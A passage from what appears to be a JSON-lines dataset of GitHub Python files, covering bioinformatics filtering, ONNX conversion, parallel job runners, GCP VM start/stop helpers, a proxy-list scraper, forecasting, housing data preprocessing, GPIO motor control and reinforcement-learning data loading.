parser.add_argument('-i', '--input', type=str,\n help='Path to genome input')\n parser.add_argument('-d', '--dat', type=str,\n help='Path to clusters file(.dat)')\n parser.add_argument('-c', '--clusters', type=int, nargs='+',\n help='Spaced list of clusters to be included')\n parser.add_argument('-o', '--output', type=str, default=\"genome_filt.fasta\" ,\n help='Path to put output genome [%(default)s]')\n parser.add_argument('-f', '--format', type=str, default=\"fasta\", metavar=\"STR\",\n help='Input file format [%(default)s]')\n args = parser.parse_args()\n return args\n\n\ndef filt_clust(genoma, clust_list, clusters):\n index_list = [True if int(line.split()[0]) in clusters else False for line in clust_list]\n return compress(genoma, index_list)\n\ndef main():\n args = get_arguments()\n genome = list(SeqIO.parse(args.input, args.format))\n with open(args.dat,\"r\") as file:\n clust_list = file.readlines()\n genome_filt = filt_clust(genome, clust_list,args.clusters)\n SeqIO.write(genome_filt, args.output, args.format)\n\nif __name__ == '__main__':\n main()\n","repo_name":"sivico26/Bioinfo_errands","sub_path":"Scripts/clust_filt.py","file_name":"clust_filt.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"27158428781","text":"from nnoir.functions import *\nfrom .utils import *\n\n\nclass OpSoftmax(Op):\n\n def __init__(self, node, *args):\n super(OpSoftmax, self).__init__(node, *args)\n\n self.axis = 1\n for attr in self.node.attribute:\n if attr.name == 'axis':\n self.axis = attr.i\n\n def to_function(self, env, constants):\n return [\n Softmax(\n list(self.node.input),\n list(self.node.output),\n axis=self.axis\n )\n ]\n","repo_name":"lflyme/nnoir","sub_path":"nnoir-onnx/nnoir_onnx/operators/softmax.py","file_name":"softmax.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"27840964995","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\ntry:\n from . import slave\nexcept:\n import slave\n\nimport os\nimport sys\nfrom subprocess import Popen\nimport subprocess\nimport pickle\nimport datetime\nfrom queue import Queue\nfrom threading import Thread\nimport time\nimport tempfile\nimport random\nimport string\nimport hashlib\nimport signal\nimport numpy as np\nimport __main__\nimport tempfile\n\n#path = os.getcwd().replace('\\\\', '/') #uncomment to save to active folder\nTMP_PATH = tempfile.gettempdir()\n\nMIN_TIME = 1\n\nclass Parallel():\n \"\"\"creates the slaves\"\"\"\n def __init__(self, max_nodes, run_parallel, callback_active):\n \"\"\"module is a string with the name of the modulel where the\n functions you are going to run are \"\"\"\n if max_nodes is None:\n self.cpu_count=os.cpu_count()\n else:\n self.cpu_count=max_nodes\n self.callback_active = callback_active\n n=self.cpu_count\n self.kill_warned = False\n self.is_parallel = run_parallel\n #directely in the simplest way, without any layers or multiprocessing (for debugging).\n\n self.dict_file = create_temp_files(self.cpu_count)\n self.slaves=[Slave(run_parallel, n) for i in range(n)]\n self.final_results = {}\n self.n_tasks = {}\n self.t = time.time()\n self.pids = []\n self.master_pid = os.getpid()\n self.sum_running = {}\n for i in range(n):\n self.slaves[i].confirm(i) \n pid=str(self.slaves[i].p_id)\n if int(i/5.0)==i/5.0:\n pid='\\n'+pid\n self.pids.append(pid)\n pstr=\"\"\"Multi core processing enabled using %s cores. \\n\nMaster PID: %s \\n\nSlave PIDs: %s\"\"\" %(n, self.master_pid,', '.join(self.pids))\n print (pstr)\n\n def send_dict(self, d):\n f = open(self.dict_file, 'wb')\n pickle.dump(d, f) \n f.close()\n r = []\t\t\n return self.async_send_receive('transfer dictionary', self.dict_file)\n\n\n def exec(self, tasks, name):\n #Handles at most as many tasks as cpus for the moment\n if tasks is None:\n tasks = [None]*self.cpu_count\n if type(tasks)==str:\n tasks = [tasks]*self.cpu_count\n self.n_tasks[name] = len(tasks)\n self.final_results[name] = [None]*self.n_tasks[name]\n self.sum_running[name] = len(tasks)\n return self.async_send_receive(name, tasks)\n\n def callback(self, name, outbox = {}, s_id = None, collect_finnished_procs = True):\n if not self.callback_active:\n return [{}]*self.cpu_count\n d=[]\n sumrun = -1\n while time.time() - self.t self.best_val_acc:\n self.best_val_acc = val_acc\n self.model.save_weights(self.model_path)\n # test_acc = evaluate(self.test_generator,self.model.predict)\n print(\n u'val_acc: %.5f, best_val_acc: %.5f\\n' %\n (val_acc, self.best_val_acc)\n )\n\n def on_train_end(self, logs=None):\n if self.test_generator:\n test_acc = evaluate(self.test_generator, self.model.predict)\n print(\n u'best_val_acc: %.5f, test_acc: %.5f\\n' %\n (self.best_val_acc, test_acc)\n )\n","repo_name":"leefsir/Text_Classification","sub_path":"utils/data_process.py","file_name":"data_process.py","file_ext":"py","file_size_in_byte":8713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19012530347","text":"#! /usr/bin/env python\n## -*- Mode: python; py-indent-offset: 4; indent-tabs-mode: nil; coding: utf-8; -*-\n#\nfrom subprocess import Popen, PIPE, STDOUT\nimport time\nimport os\nimport datetime\nfrom threading import Thread, Lock\nfrom Queue import Queue\n\n\ndef h_r(quantity, multiple=1024):\n if quantity == 0:\n quantity = +0\n SUFFIXES = [\"B\"] + [i + {1000: \"B\", 1024: \"iB\"}[multiple] for i in \"KMGTPEZY\"]\n for suffix in SUFFIXES:\n if quantity < multiple or suffix == SUFFIXES[-1]:\n if suffix == SUFFIXES[0]:\n return \"%d%s\" % (quantity, suffix)\n else:\n return \"%.1f%s\" % (quantity, suffix)\n else:\n quantity /= multiple\n\ndef niceTime(t):\n return str(datetime.timedelta(seconds=int(t)))\n\n\n\n\n\n\nclass Worker(Thread):\n \"\"\"This is the main worker - it will process jobs as long as the \"job\n queue\" has jobs available.\n \"\"\"\n # this lock is used to avoid messing up the screen output - only\n # one worker will write to screen at a given time. It is\n # technically a Mutual Exclusion (mutex)\n screen_mutex = Lock()\n\n def __init__(self, queue, file):\n # initialize the base class\n super(Worker, self).__init__()\n self.queue = queue\n self.file=file\n self.envviron=os.environ\n self.envviron[\"LD_LIBRARY_PATH\"]=\".:../:../../ns-3.14/build/\"\n\n def log(self, message):\n Worker.screen_mutex.acquire() \n print(\"{timestamp:%d-%b-%Y %H:%M:%S.%f UTC} \"\n \"{name}: {message}\".format(timestamp=datetime.datetime.utcnow(),\n name=self.getName(),\n message=message))\n if(message):\n self.file.write(message)\n self.file.flush()\n \n Worker.screen_mutex.release()\n\n def run(self):\n while True:\n job = self.queue.get()\n before = time.time()\n args1=\"%s\" %(job['num'])\n \n p = Popen(['./testtos',args1], stdout=PIPE, stderr=STDOUT,env=self.envviron)\n stdout, stderr = p.communicate()\n after = time.time()\n\n if(stdout):\n msg = \"%s\" %(stdout)\n self.log(msg)\n \n if stderr:\n msg = \"STERR: %s\" %(stderr)\n self.log(msg)\n \n# msg = \"Finished run with = %s open libs running time %s\" \\\n# %(job['num'],niceTime(after-before))\n# self.log(msg)\n\n # when the job is done, you signal the queue - refer to\n # the Queue module documentation\n self.queue.task_done()\n\n\ndef main(number_of_workers):\n runtime=2300\n incr = 100\n number_of_jobs=int((runtime)/incr)\n queue = Queue() \n statinfo = os.stat(\"libtosblink.so\") \n run_log = \"SUMMARY.EFL-TESTS.%s.LOG\" %h_r(statinfo.st_size) \n runLog = open(run_log,'w')\n\n for _ in range(number_of_workers):\n worker = Worker(queue,runLog)\n worker.daemon = True \n worker.start()\n\n\n for _ in range(number_of_jobs):\n args={'num':_*incr}\n queue.put(args)\n \n\n queue.join()\n runLog.close() \n\nif __name__ == \"__main__\":\n import multiprocessing\n # call main \n main(5)\n","repo_name":"Northshoot/symphony","sub_path":"elf/tos/test-runner.py","file_name":"test-runner.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40541504182","text":"import logging\nimport os\nimport subprocess\nfrom collections.abc import Collection\nfrom threading import Thread\n\nlogger = logging.getLogger(__name__)\n\nAUTHENTICATION_COMMAND = \"gcloud auth activate-service-account --key-file=%s\"\nSET_PROPERTY_PROJECT = \"gcloud config set project %s\"\nMACHINE_STARTING_COMMAND = \"gcloud compute instances start %s --zone=%s\"\nMACHINE_STOPPING_COMMAND = \"gcloud compute instances stop %s --zone=%s\"\n\n# Key path location relative to this file's directory\nRELATIVE_KEY_PATH = \"../../gcp_keys/gcp_key.json\"\nDEFAULT_PROJECT = \"guardicore-22050661\"\n\n\ndef initialize_gcp_client():\n abs_key_path = get_absolute_key_path()\n\n subprocess.call(get_auth_command(abs_key_path), shell=True) # noqa: DUO116\n logger.info(\"GCP Handler passed key\")\n\n subprocess.call(get_set_project_command(DEFAULT_PROJECT), shell=True) # noqa: DUO116\n logger.info(\"GCP Handler set project\")\n logger.info(\"GCP Handler initialized successfully\")\n\n\ndef get_absolute_key_path() -> str:\n file_dir = os.path.dirname(os.path.realpath(__file__))\n absolute_key_path = os.path.join(file_dir, RELATIVE_KEY_PATH)\n absolute_key_path = os.path.realpath(absolute_key_path)\n\n if not os.path.isfile(absolute_key_path):\n raise FileNotFoundError(\n \"GCP key not found. \" \"Add a service key to envs/monkey_zoo/gcp_keys/gcp_key.json\"\n )\n return absolute_key_path\n\n\ndef start_machines(machine_list: dict[str, Collection[str]]):\n \"\"\"\n Start all the machines in the list.\n :param machine_list: A dictionary with zone and machines per zone.\n \"\"\"\n logger.info(\"Setting up all GCP machines...\")\n try:\n run_gcp_command(MACHINE_STARTING_COMMAND, machine_list)\n logger.info(\"GCP machines successfully started.\")\n except Exception as e:\n logger.error(\"GCP Handler failed to start GCP machines: %s\" % e)\n raise e\n\n\ndef stop_machines(machine_list: dict[str, Collection[str]]):\n try:\n run_gcp_command(MACHINE_STOPPING_COMMAND, machine_list)\n logger.info(\"GCP machines stopped successfully.\")\n except Exception as e:\n logger.error(\"GCP Handler failed to stop network machines: %s\" % e)\n\n\ndef get_auth_command(key_path):\n return AUTHENTICATION_COMMAND % key_path\n\n\ndef get_set_project_command(project):\n return SET_PROPERTY_PROJECT % project\n\n\ndef _run_gcp_command(gcp_command: str, machine_list: Collection[str], zone: str):\n \"\"\"Runs the command in the given zone\"\"\"\n ret = subprocess.run( # noqa DUO116\n (gcp_command % (\" \".join(machine_list), zone)),\n stderr=subprocess.PIPE,\n stdout=subprocess.PIPE,\n shell=True,\n )\n if ret.returncode != 0:\n raise Exception(f\"Failed starting GCP machines: {ret.stderr.decode()}\")\n\n\ndef run_gcp_command(gcp_command: str, machine_list: dict[str, Collection[str]]):\n command_threads = [\n Thread(target=_run_gcp_command, args=(gcp_command, machine_list[zone], zone))\n for zone in machine_list\n ]\n for thread in command_threads:\n thread.start()\n for thread in command_threads:\n thread.join()\n","repo_name":"guardicore/monkey","sub_path":"envs/monkey_zoo/blackbox/utils/gcp_machine_handlers.py","file_name":"gcp_machine_handlers.py","file_ext":"py","file_size_in_byte":3113,"program_lang":"python","lang":"en","doc_type":"code","stars":6367,"dataset":"github-code","pt":"21"} +{"seq_id":"19359177113","text":"import os\nfrom forecast_deepar import ForecastDeepAR\nfrom forecast_holtwinters import ForecastHoltWinters\nfrom forecast_lgb import ForecastLGB\nfrom supply_chain import SupplyChain\nimport pandas as pd\n\ndef main():\n if not os.path.exists('../data/forecast'):\n os.mkdir('../data/forecast')\n if not os.path.exists('../data/submit'):\n os.mkdir('../data/submit')\n holt_winters=ForecastHoltWinters()\n holt_winters.run()\n lgb=ForecastLGB()\n lgb.run()\n deepar=ForecastDeepAR()\n deepar.run()\n supply_chain1 = SupplyChain(2.5, '../data/forecast/holtwinters_result.csv')\n supply_chain1.run()\n supply_chain2 = SupplyChain(1, '../data/forecast/lgb80_result.csv')\n supply_chain2.run()\n supply_chain3 = SupplyChain(2.5, '../data/forecast/deepar_result_mean.csv')\n supply_chain3.run()\n supply_chain4 = SupplyChain(1, '../data/forecast/deepar_result_80.csv')\n supply_chain4.run()\n result_df_list = []\n for result in os.listdir('../data/submit'):\n result_df = pd.read_csv(f'../data/submit/{result}')\n result_df_list.append(result_df)\n merge_result = result_df.copy()[['unit', 'ts', 'qty']]\n merge_result['qty'] = 0\n for result_df in result_df_list:\n merge_result['qty'] += result_df['qty']\n merge_result['qty'] = merge_result['qty'] / len(result_df_list)\n merge_result.to_csv('../submit/submit.csv')\n\nif __name__ == '__main__':\n main()","repo_name":"Uroboros0313/Tianchi_SupplyChain","sub_path":"code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"31669168644","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport re\nfrom proxy_pool.items import ProxyPoolItem\n\n\nclass XicidailiSpider(scrapy.Spider):\n name = 'xicidaili'\n allowed_domains = ['xicidali.com']\n start_urls = ['http://www.xicidaili.com/']\n\n def parse(self, response):\n ips = re.findall('(\\d+\\.\\d+\\.\\d+\\.\\d+)', response.text)\n ports = re.findall('(\\d+)', response.text)\n types = re.findall('([^<]+)', response.text)\n protocols = re.findall('(HTTPS?)', response.text)\n for ip, port, _type, protocol in zip(ips, ports, types, protocols):\n yield ProxyPoolItem({\n 'ip': ip,\n 'protocol': protocol,\n 'port': port,\n 'types': _type\n })\n","repo_name":"jiazone/proxy_pool","sub_path":"proxy_pool/spiders/xicidaili.py","file_name":"xicidaili.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"14117461943","text":"from entity.pokemon import PokemonEntity\n\nfrom service.pokemon import pokemon_service\n\n\nclass PokemonController:\n\n async def get_pokemons(self):\n results = await pokemon_service.get_all()\n return {\"message\": \"Get all pokemons\", \"pokemons\": results}\n\n async def get_pokemon_by_id(self, id: int):\n result = await pokemon_service.find_by_id(id)\n return {\"message\": \"Get one pokemon by ID\", \"result\": result}\n\n async def get_pokemon_by_name(self, name: str):\n result = await pokemon_service.find_by_name(name)\n return {\"message\": \"Get one pokemon by NAME\", \"result\": result}\n\n async def create_pokemon(self, pokemon: PokemonEntity):\n await pokemon_service.create(pokemon)\n return {\"message\": \"✅Create a new pokemon\", \"pokemon\": pokemon}\n\n async def update_pokemon(self, pokemon: PokemonEntity):\n updated = await pokemon_service.update(pokemon)\n return {\"message\": \"✅Update pokemon done\", \"updated pokemon\": updated}\n\n async def delete_pokemon(self, id: int):\n try:\n is_exist = await pokemon_service.get_one(id)\n if is_exist:\n await pokemon_service.delete(id)\n\n return {\"message\": \"✅Success deleting pokemon\"}\n except:\n return {\"message\": \"❌Error during deleting\"}\n\n\npokemon_controller = PokemonController()\n","repo_name":"SekmSet/python-master","sub_path":"fastApi/controller/pokemon.py","file_name":"pokemon.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"10638640960","text":"import numpy as np\nimport pandas as pd\nfrom string import digits\nfrom sklearn.feature_selection import SelectKBest\nfrom scipy.stats import pearsonr\nfrom matplotlib import pyplot as plt\nfrom string import digits\nfrom sklearn import svm\nimport os\n\nos.getcwd()\n\nds = pd.read_csv('/Users/chengmingcui/Desktop/9321/melb_data.csv')\ncols_to_drop = ['Method','SellerG','Date','CouncilArea','Propertycount','Rooms','Postcode']\n\ndf = ds.drop(cols_to_drop, axis=1)\ndata = df.dropna()\ndata = data.reset_index(drop = True)\n\n\n## transform suburb to digit\nsuburb_list = data[\"Suburb\"].value_counts().index.tolist()\ndata_dict_suburb = {}\nflag = 0\nfor i in suburb_list:\n data_dict_suburb[i] = flag\n flag += 1\nsuburb = data[\"Suburb\"].tolist()\nll = []\nfor i in suburb:\n ll.append(data_dict_suburb[i])\n\ndata[\"flag_suburb\"] = ll\ndata.head()\naddress = data[\"Address\"].tolist()\nfinal_address = []\nfor i in address:\n for j in range(len(i)):\n if i[j] == \" \":\n res = i[j:].strip()\n final_address.append(res)\n break\ndata['street_Address'] = final_address\n\n\naddress_list = data['street_Address'].value_counts().index.tolist()\naddress_dict = {}\ncount = 0\nfor i in address_list:\n address_dict[i] = count\n count+=1\n \n##transform street to digit\nstreet_address_list = data['street_Address'].tolist()\nnew_Address = []\nfor i in street_address_list:\n new_Address.append(address_dict[i])\ndata['flag_street_Address'] = new_Address\n\ntype_list = data['Type'].value_counts().index.tolist()\ntype_dict={}\ncount = 0\nfor i in type_list:\n type_dict[i] = count\n count+=1\nflag_type= []\ntype_list_all = data['Type'].tolist()\nfor i in type_list_all:\n flag_type.append(type_dict[i])\ndata['flag_type'] = flag_type\n\n## transform region to digit\nRegion = data['Regionname'].value_counts().index.tolist()\nregion_dict = {}\ncount = 0\nfor i in Region:\n region_dict[i] = count\n count += 1\nregion_list = data['Regionname'].tolist()\nflag_regionname =[]\nfor i in region_list:\n flag_regionname.append(region_dict[i])\ndata['flag_regionname'] = flag_regionname\n\n\ndrop_col_second = ['Suburb','Address','Type','Regionname','street_Address']\ndata_final = data.drop(drop_col_second, axis=1)\n## the final data\ndata_final\n\n\n\n##the function remove the outlier from the data\ndef get_outliners(dataset, outliers_fraction=0.25):\n clf = svm.OneClassSVM(nu=0.95 * outliers_fraction + 0.05, kernel=\"rbf\", gamma=0.1)\n clf.fit(dataset)\n result = clf.predict(dataset)\n return result\n## the data after remove the outlier from the data\ntraining_dataset = data_final[get_outliners(data_final, 0.15)==1]\n\n\n## get the trainning data,testdata\ninput_cols =['Distance', 'Bedroom2', 'Bathroom', 'Car', 'Landsize',\n 'BuildingArea', 'YearBuilt', 'Lattitude', 'Longtitude', 'flag_suburb',\n 'flag_street_Address', 'flag_type','flag_regionname']\noutput_col = ['Price']\nX = training_dataset[input_cols].astype(float)\nY = training_dataset[output_col].astype(float)\nX= X.reset_index(drop = True)\nY = Y.reset_index(drop=True)\nX[:3289].to_csv('X_training_data.csv')\nX[3289:].to_csv('X_test_data.csv')\nY[:3289].to_csv('Y_training_data.csv')\nY[3289:].to_csv('Y_test_data.csv')\n","repo_name":"chengmingcui/9321masterteam","sub_path":"data_processing.py","file_name":"data_processing.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"37016382928","text":"def kmedians(points, k, max_iterations=1000):\n from scipy.spatial.distance import cdist\n\n # Initialize k centroids randomly\n centroids = points[np.random.choice(range(len(points)), k, replace=False)]\n # Initialize cluster labels as zeros\n \n for _ in range(max_iterations):\n # Assign each data point to its closest centroid\n distances = cdist(points, centroids, metric='cityblock')\n labels = np.argmin(distances, axis=1)\n\n # Update the cluster centers using medians\n new_centers = np.array([np.median(points[labels == i], axis=0) for i in range(k)])\n\n # Check convergence\n if np.array_equal(centroids, new_centers):\n break\n\n centroids = new_centers\n\n # prev_labels = labels.copy()\n dict_dividedPoints = { i: points[labels == i] for i in range(k) }\n # Return the centroids and labels\n return centroids, dict_dividedPoints\n","repo_name":"mrfikri-ai/Machine-Learning","sub_path":"Clustering/kmedians.py","file_name":"kmedians.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15456799493","text":"import logging\nimport time\n\nfrom smbus2 import SMBus\n\nfrom raspberry_py.gpio import setup, CkPin, cleanup\nfrom raspberry_py.gpio.adc import ADS7830\nfrom raspberry_py.gpio.motors import DcMotor, DcMotorDriverL293D\n\n\ndef main():\n \"\"\"\n This example drives a DC motor as shown on page 164 of the tutorial.\n \"\"\"\n\n logging.getLogger().setLevel(logging.DEBUG)\n\n setup()\n\n # create a/d converter for potentiometer. rescale potentiometer to the speed values expected by the motor.\n adc = ADS7830(\n input_voltage=3.3,\n bus=SMBus('/dev/i2c-1'),\n address=ADS7830.ADDRESS,\n command=ADS7830.COMMAND,\n channel_rescaled_range={0: (-100, 100)}\n )\n\n dc_motor = DcMotor(\n driver=DcMotorDriverL293D(\n enable_pin=CkPin.GPIO22,\n in_1_pin=CkPin.GPIO27,\n in_2_pin=CkPin.GPIO17\n ),\n speed=0\n )\n\n # start motor and update its speed on a/d events\n dc_motor.start()\n adc.event(lambda s: dc_motor.set_speed(s.channel_value[0]))\n\n try:\n while True:\n adc.update_state()\n time.sleep(0.5)\n except KeyboardInterrupt:\n pass\n\n dc_motor.stop()\n adc.close()\n cleanup()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"MatthewGerber/raspberry-py","sub_path":"src/raspberry_py/gpio/examples/dc_motor_with_potentiometer.py","file_name":"dc_motor_with_potentiometer.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"32447425910","text":"import random\nimport string\n\n# randomly remove x% of characters in name\ndef random_remove(name, remove_prob):\n if not name: return name\n randomized_name = ''\n for char in name:\n random_value = random.random()\n if random_value >= remove_prob:\n randomized_name += char\n return randomized_name\n\n# randomly replace x% of characters with another lower-case alphabetic character\ndef random_replace(name, replace_prob):\n if not name: return name\n randomized_name = ''\n for char in name:\n random_value = random.random()\n if random_value < replace_prob:\n next_char = random.choice(string.ascii_lowercase)\n else:\n next_char = char\n randomized_name += next_char\n return randomized_name\n\n# randomly set name to None/NULL x% of the time\ndef random_null(name, null_prob):\n random_value = random.random()\n if random_value < null_prob:\n return None\n else:\n return name\n\n# randomly remove/replace characters in name, and randomly set entire name to NULL with given probabilities\ndef mangle_org_name(name, remove_prob, replace_prob, null_prob):\n randomized_name = random_null(name, null_prob)\n randomized_name = random_remove(randomized_name, remove_prob)\n randomized_name = random_replace(randomized_name, replace_prob)\n\n return randomized_name\n \n","repo_name":"openreferral/silobuster-model-trainer","sub_path":"manglers/mangle_org_name.py","file_name":"mangle_org_name.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"393490904","text":"import taichi as ti\nimport numpy as np\nimport math\n\nfrom global_variabel import *\nfrom script.helper_function import *\n\n## declare field\nmesh_position = None\nmesh_rotation = []\n\n## initialize bodies\ndef init_collision_bodies():\n # init rotation\n for b_idx in range(num_static_meshes+num_dynamic_meshes):\n mesh_rotation.append(ti.Vector([0., (3./2.)*math.pi, 0.]))\n # mesh_rotation[b_idx] = ti.Vector([0., math.pi - 0.5*b_idx, 0.])\n\ndef init_collision_bodies_lighthouse_scene():\n # init rotation\n for b_idx in range(num_collision_bodies):\n mesh_rotation[b_idx] = ti.Vector([0., (math.pi/4)*b_idx, 0.])\n # create mesh particles\n idx = 0\n for b_idx in range(num_collision_bodies):\n mesh = meshio.read(mesh_names[b_idx])\n mesh_points = mesh.points\n R = rotation_mat(mesh_rotation[b_idx][0],mesh_rotation[b_idx][1],mesh_rotation[b_idx][2])\n print_mesh_info(b_idx, mesh_points.shape[0], R)\n for i in range(mesh_points.shape[0]):\n mesh_position[idx] = ti.Vector(R @ np.array(mesh_points[i]))\n mesh_position[idx] *= 10* (1-b_idx*0.65)\n mesh_position[idx] += ti.math.vec3([21., 1., 14.]) + b_idx*ti.math.vec3([-6., 0., 15.])\n idx += 1 \n\ndef init_collision_bodies_bathroom_scene():\n # init rotation\n for b_idx in range(num_collision_bodies):\n mesh_rotation[b_idx] = ti.Vector([0., math.pi/2.- (0.3+math.pi)*b_idx, 0.])\n # create mesh particles\n idx = 0\n for b_idx in range(num_collision_bodies):\n mesh = meshio.read(mesh_names[b_idx])\n mesh_points = mesh.points\n R = rotation_mat(mesh_rotation[b_idx][0],mesh_rotation[b_idx][1],mesh_rotation[b_idx][2])\n print_mesh_info(b_idx, mesh_points.shape[0], R)\n for i in range(mesh_points.shape[0]):\n mesh_position[idx] = ti.Vector(R @ np.array(mesh_points[i]))\n mesh_position[idx] *= 8 * (1-b_idx/2*0.3)\n mesh_position[idx] += ti.math.vec3([22., 0., 40.]) + b_idx*ti.math.vec3([-7., 0., -20./(b_idx+1)])\n idx += 1 \n\n## print info\ndef print_mesh_info(b_idx, num, R):\n print(\"Insert Mesh vtk-file: \"+mesh_names[b_idx]+\"\\n\"\n +\" number of particles: \"+str(num)+\"\\n\"\n +\" rotation angels: \"+str(mesh_rotation[b_idx])+\"\\n\"\n +\" rotation matrix: [\"+str(R[0])+\"\\n\"\n +\" \"+str(R[1])+\"\\n\"\n +\" \"+str(R[2])+\"]\")\n print('-'*term_size.columns)","repo_name":"mingj1125/PBS_Project","sub_path":"script/mesh_collision.py","file_name":"mesh_collision.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36279277112","text":"import torch\nfrom ppo_wdail.systems.datagenerator import DataGenerator\nfrom VAE.models.swae import SWAE\nimport numpy as np\nimport os\nimport pickle\n\nclass ExpertDataLoader(torch.utils.data.Dataset):\n def __init__(self, params, data_size, batch_size, device):\n self.data_generator = DataGenerator()\n self.data_generator.generate_data()\n ntrain, ntest, file_batch_num = self.data_generator.__len__()\n print(\"Total Train Dataset Size: \", ntrain, \" Total Test Dataset Size: \", ntest, \"File Batch Size: \", file_batch_num)\n self.data_size = data_size\n self.batch_size = batch_size\n self.file_batch_num = file_batch_num\n self.params = params\n self.device = device\n self.load_neighbors = None\n self.dataset_array = []\n\n def sample_neighbor(self, neighbors_num, name=\"train\"):\n if self.load_neighbors == neighbors_num:\n # ランダムにデータを取得\n idx = np.random.randint(0, len(self.dataset_array))\n dataset = self.dataset_array[idx]\n state = np.array(dataset)[0:-1]\n neighbor = np.array(state[3]).flatten()\n return neighbor\n else:\n print(\"Dataset must be loaded\")\n return None\n\n def sample_size(self, neighbors_num, name=\"train\"):\n if self.load_neighbors == neighbors_num:\n return len(self.dataset_array)\n else:\n print(\"Dataset must be loaded\")\n return None\n\n def load_batch(self, idx=None):\n # キャッシュが存在する場合はそれを読み込む\n if os.path.exists(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../cache/cache_id{}.pkl'.format(idx))):\n with open(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../cache/cache_id{}.pkl'.format(idx)), 'rb') as f:\n dataset = pickle.load(f)\n print(\"dataset loaded from \", os.path.join(os.path.dirname(os.path.abspath(__file__)), '../cache/cache_id{}.pkl'.format(idx)))\n return dataset\n train_dataset_dict, test_dataset_dict = self.data_generator.load_data(idx)\n model = SWAE(**self.params[\"swae\"]).to(self.device)\n model_load_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), '../../VAE/output/model.pth')\n model.load_state_dict(torch.load(model_load_path, map_location=self.device))\n model.eval()\n dataset = []\n # 周辺UAV数でデータを分割\n for key in train_dataset_dict.keys():\n print(\"agent_num: \", key, \" train_dataset: \", len(train_dataset_dict[key]))\n train_dataset = train_dataset_dict[key]\n batch_x = []\n batch_y = []\n # デプス画像を潜在変数に変換\n for train_data in train_dataset:\n depth = train_data[4]\n depth = torch.from_numpy(depth).unsqueeze(0).unsqueeze(0).to(self.device)\n mu, log_var = model.encode(depth)\n z = model.reparameterize(mu, log_var)\n train_data[4] = z.cpu().detach().numpy()\n state = np.array(train_data)[0:-1]\n action = np.array(train_data)[-1]\n goal = np.array(state[1]).flatten()\n velocity = np.array(state[2]).flatten()\n neighbor = np.array(state[3]).flatten()\n depth = np.array(state[4][0]).flatten()\n combined = np.concatenate((goal, velocity, depth, neighbor))\n batch_x.append(combined)\n batch_y.append(action)\n batch_x = np.array(batch_x, dtype=np.float32)\n batch_y = np.array(batch_y, dtype=np.float32)\n # バッチサイズに分割してtorchに変換\n for i in range(0, len(batch_x), self.params[\"ppo\"][\"batch_size\"]):\n batch_x_torch = torch.from_numpy(batch_x[i:i+self.params[\"ppo\"][\"batch_size\"]])\n batch_y_torch = torch.from_numpy(batch_y[i:i+self.params[\"ppo\"][\"batch_size\"]])\n dataset.append([batch_x_torch, batch_y_torch])\n # batch_x_torchのサイズは, 3(goal position) + 3(velocity) + 6*neighbor_num + hidden state\n print(\"dataset size: \", len(dataset), \"x\", self.params[\"ppo\"][\"batch_size\"])\n with open(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../cache/cache_id{}.pkl'.format(idx)), 'wb') as f:\n pickle.dump(dataset, f)\n return dataset\n\nclass ExpertDataset(torch.utils.data.Dataset):\n def __init__(self, params, device, save_memory=False, use_preprocessed_data=False):\n self.save_memory = save_memory\n self.data_generator = DataGenerator(params=params, device=device, encode_depth=save_memory)\n # TODO: use_preprocessed_dataに対応\n if not use_preprocessed_data:\n self.data_generator.generate_data()\n ntrain, ntest, file_batch_num = self.data_generator.__len__()\n print(\"Total Train Dataset Size: \", ntrain, \" Total Test Dataset Size: \", ntest, \"File Batch Size: \", file_batch_num)\n self.file_batch_num = file_batch_num\n\n self.data_size = params[\"wdail\"][\"data_size\"]\n self.params = params\n self.device = device\n self.load_neighbors = None\n self.trajectory = {}\n\n self.encoder = SWAE(**self.params[\"swae\"]).to(self.device)\n model_load_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), '../../VAE/output/model.pth')\n self.encoder.load_state_dict(torch.load(model_load_path, map_location=self.device))\n self.encoder.eval()\n\n def load_dataset(self, neighbors_num, name=\"train\"):\n if self.load_neighbors == neighbors_num:\n print(\"Dataset already loaded\")\n return\n self.load_neighbors = neighbors_num\n # キャッシュが存在する場合はそれを読み込む\n file_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), '../cache/cache_{}_nn{}.pkl'.format(name, neighbors_num))\n if os.path.exists(file_path):\n with open(file_path, 'rb') as f:\n dataset = pickle.load(f)\n print(\"dataset loaded from \", file_path)\n self.trajectory = dataset\n return\n train_dataset, _ = self.data_generator.load_data(neighbors_num=neighbors_num, max_data_size=self.data_size)\n state_array = []\n action_array = []\n\n if not 